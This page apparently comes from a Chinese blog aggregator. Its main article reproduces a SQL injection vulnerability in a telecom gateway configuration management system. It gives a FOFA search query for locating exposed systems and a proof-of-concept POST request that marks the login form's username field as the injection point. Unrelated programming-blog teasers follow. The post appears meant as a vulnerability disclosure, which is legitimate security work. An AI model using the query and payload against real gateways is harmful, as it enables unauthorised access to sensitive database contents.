当前位置：首页 > news >正文

【漏洞复现】电信网关配置管理系统SQL注入漏洞

news 2026/2/8 23:27:25

Nx01 产品简介

电信网关配置管理系统是一个用于管理和配置电信网络中网关设备的软件系统。它可以帮助网络管理员实现对网关设备的远程监控、配置、升级和故障排除等功能，从而确保网络的正常运行和高效性能。

Nx02 漏洞描述

电信网关配置管理系统存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。

Nx03 产品主页

fofa-query: body="img/dl.gif" && title="系统登录"

Nx04 漏洞复现

POC：

POST /manager/login.php HTTP/1.1
Host: {{Hostname}}
Content-Length: 53
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: closeName=admin*&Pass=admin

Nx05 修复建议

建议联系软件厂商进行处理。

【漏洞复现】电信网关配置管理系统SQL注入漏洞

Nx01 产品简介电信网关配置管理系统是一个用于管理和配置电信网络中网关设备的软件系统。它可以帮助网络管理员实现对网关设备的远程监控、配置、升级和故障排除等功能，从而确保网络的正常运行和高效性能。 Nx02 漏洞描述电信网关配置管理系统存在SQL注入漏洞,攻…...

编程日记 2024/2/7 19:37:31

2018年苏州大学837复试机试C/C++

2018年苏州大学复试机试要求要求用C/C编程；对程序中必要的地方进行注释。上机规则请在电脑桌面上新建一个文件夹文件夹名为考试姓名（中文）；考试完毕后，将所编写的文件放在上述文件中。第一题（20分&…...

编程日记 2024/2/7 19:36:29

【Jenkins】pipeline基本使用

目录一、pipeline 二、创建pipeline项目 1、安装pipeline插件 2、创建pipeline项目三、pipeline语法 1、pipeline组成 2、agent：指定流水线的执行位置，流水线中每个阶段都必须在某个地方执行 3、stage：阶段，代表流水线的…...

编程日记 2024/2/7 19:33:27

Bytebase 签约 Vianova，助力欧洲城市交通智能平台中 Snowflake 和 PG 的变更自动化及版本控制

在数字化发展的浪潮中，自动化数据库变更管理成为提升产品上线效率、降低人为失误风险的关键工具，同时促进流程的一致性与标准化，确保合规性和变更的可追溯性。近日，数据库 DevOps 团队协同管理工具 Bytebase 签约欧洲交通数据管理…...

编程日记 2024/2/7 19:30:24

SpringBoot 事务管理Transactional 数据回滚数据一致性

介绍 SpringBoot当中的事物他保证了一致性，要么全部一起成功（提交），要么一起失败，失败（回滚）后数据会回到当初的样子，是一组操作的集合。事物类型开启事物提交事物回滚事物案…...

编程日记 2024/2/7 19:27:21

vue使用pdf.js实现在线查看pdf文件

需求：有一个列表页，用户点击查看，弹层展示后台接口返回的pdf内容(不是文件、地址之类的，乱码的pdf铭文(二进制文件流)) 1、pdf.js安装 npm install --save vue-pdf2、正文代码 <template><div><el-table :data&q…...

编程日记 2024/2/7 19:23:18

java---查找算法（二分查找，插值查找，斐波那契[黄金分割查找] ）-----详解 (ᕑᗢᓫ∗)˒

目录一. 二分查找（递归）： 代码详解： 运行结果： 二分查找优化： 优化代码： 运行结果（返回对应查找数字的下标集合）： 编辑二分查找（非递归…...

编程日记 2024/2/7 19:22:17

鸿蒙应用/元服务开发-窗口（Stage模型）设置悬浮窗

一、设置悬浮窗说明悬浮窗可以在已有的任务基础上，创建一个始终在前台显示的窗口。即使创建悬浮窗的任务退至后台，悬浮窗仍然可以在前台显示。通常悬浮窗位于所有应用窗口之上；开发者可以创建悬浮窗，并对悬浮窗进行属性设置等操…...

编程日记 2024/2/7 19:21:15

springboot集成easypoi导出多sheet页

pom文件 <dependency><groupId>cn.afterturn</groupId><artifactId>easypoi-base</artifactId><version>4.1.0</version> </dependency> 导出模板： 后端代码示例： /*** 导出加油卡进便利店大额审批列…...

编程日记 2024/2/7 19:20:14

自己动手打包element UI官方手册文档教程

经常用element ui朋友开发的比较郁闷，官方文档网基本上都是打不开的， 官方：https://element.eleme.io/ 一直打不开，分析下是里面用的cdn链接ssl证书无效。就想着自己搭建一个element UI文档自己搭建的： Element文档网…...

编程日记 2024/2/7 19:19:13

《计算机网络简易速速上手小册》第5章：无线网络和移动通信（2024 最新版）

5.1 WLAN的工作原理 - 揭秘无线局域网络的魔法 5.1.1 基础知识无线局域网络（WLAN）允许设备通过无线方式连接到一个局部区域网络，主要基于IEEE 802.11标准，俗称Wi-Fi。WLAN的核心是无线路由器，它不仅充当着网络中各设…...

编程日记 2024/2/7 19:18:12

2024PMP考试新考纲-近年PMP真题练一练和很详细解析（3）

今天华研荟继续为您分享和解析PMP真题，一方面让大家感受实际的PMP考试和出题形式，另一方面是通过较详细的解题思路和知识讲解帮助大家最后一个多月有效备考，一次性3A通过2024年PMP考试。 2024年PMP考试新考纲-近年真题随机练一练 (注&#x…...

编程日记 2024/2/7 19:15:08

java SpringBoot2.7整合Elasticsearch(ES)7 进行文档增删查改

首先我们在 ES中加一个 books 索引且带有IK分词器的索引首先 pom.xml导入依赖 <dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-data-elasticsearch</artifactId> </dependency>applicatio…...

编程日记 2024/2/7 19:14:07

动态内存管理（2）

文章目录 4. 几个经典的笔试题4.1 题目14.2 题目24.3 题目34.4 题目4 5. C/C程序的内存开辟6. 动态通讯录7. 柔性数组7.1 柔性数组的特点7.2 柔性数组的使用7.3 柔性数组的优势 4. 几个经典的笔试题 4.1 题目1 #include <stdio.h> #include <stdlib.h> #include …...

编程日记 2024/2/7 19:13:06

使用 git 上传文件时，运行命令 git pull origin 时未成功，出现报错信息

项目场景： 背景： 使用 git 上传文件时，运行命令 git pull origin 时未成功，出现报错信息问题描述问题： $ git pull origin print --allow-unrelated-histories error: Pulling is not possible because you hav…...

编程日记 2024/2/7 19:11:05

Linux文件编译

目录一、GCC编译 1.直接编译 2.分步编译预处理： 编译： 汇编： 链接： 3.多文件编译 4.G 二、Make 1.概述 2.使用步骤 3.makefile创建规则 3.1一个基本规则 3.2两个常用函数 4.示例文件三、GDB 示例：…...

编程日记 2024/2/7 19:09:03

homeword_day1

第一章命名空间一．选择题 1、编写C程序一般需经过的几个步骤依次是（ B ） A. 编辑、调试、编译、连接 B. 编辑、编译、连接、运行 C. 编译、调试、编辑、连接 D. 编译、编辑、连接、运行 2、所谓数据封装就是将一组数据和与这组数据…...

编程日记 2024/2/7 19:02:58

ChatGPT论文指南|ChatGPT论文写作过程中6个润色与查重提示词

论文完成初稿之后，一般情况下，宝子们还需要找专家给我们提出评审意见。找专家评审其实并不容易，即使对老师来说，找人评审论文也是一件苦活。我们这个时候可以通过文字提示让 ChatGPT充当我们的评审专家，为论文提出问题…...

编程日记 2024/2/7 19:01:57

论文阅读：Learning Lens Blur Fields

这篇文章是对镜头模糊场进行表征学习的研究，镜头的模糊场也就是镜头的 PSF 分布，镜头的 PSF 与物距，焦距，光学系统本身的像差都有关系，实际的 PSF 分布是非常复杂而且数量也很多，这篇文章提出用一个神经网络…...

编程日记 2024/2/7 19:00:56

SpringBoot整合Knife4j接口文档生成工具

一个好的项目，接口文档是非常重要的，除了能帮助前端和后端开发人员更快地协作完成开发任务，接口文档还能用来生成资源权限，对权限访问控制的实现有很大的帮助。这篇文章介绍一下企业中常用的接口文档工具Knife4j（基于…...

编程日记 2024/2/7 18:59:55

应用升级/灾备测试时使用guarantee 闪回点迅速回退

1.场景应用要升级,当升级失败时,数据库回退到升级前. 要测试系统,测试完成后,数据库要回退到测试前。相对于RMAN恢复需要很长时间， 数据库闪回只需要几分钟。 2.技术实现数据库设置 2个db_recovery参数创建guarantee闪回点，不需要开启数据库闪回。…...

编程新知 2026/1/14 22:12:47

中南大学无人机智能体的全面评估！BEDI：用于评估无人机上具身智能体的综合性基准测试

作者：Mingning Guo, Mengwei Wu, Jiarun He, Shaoxian Li, Haifeng Li, Chao Tao单位：中南大学地球科学与信息物理学院论文标题：BEDI: A Comprehensive Benchmark for Evaluating Embodied Agents on UAVs论文链接：https://arxiv.…...

编程新知 2026/1/22 15:36:10

一、根据NETDEV_FLAG_INTERNET_UP位判断 static bool is_conncected(void) {struct netdev *dev RT_NULL;dev netdev_get_first_by_flags(NETDEV_FLAG_INTERNET_UP);if (dev RT_NULL){printf("wait netdev internet up...");return false;}else{printf("loc…...

编程新知 2025/9/23 20:06:08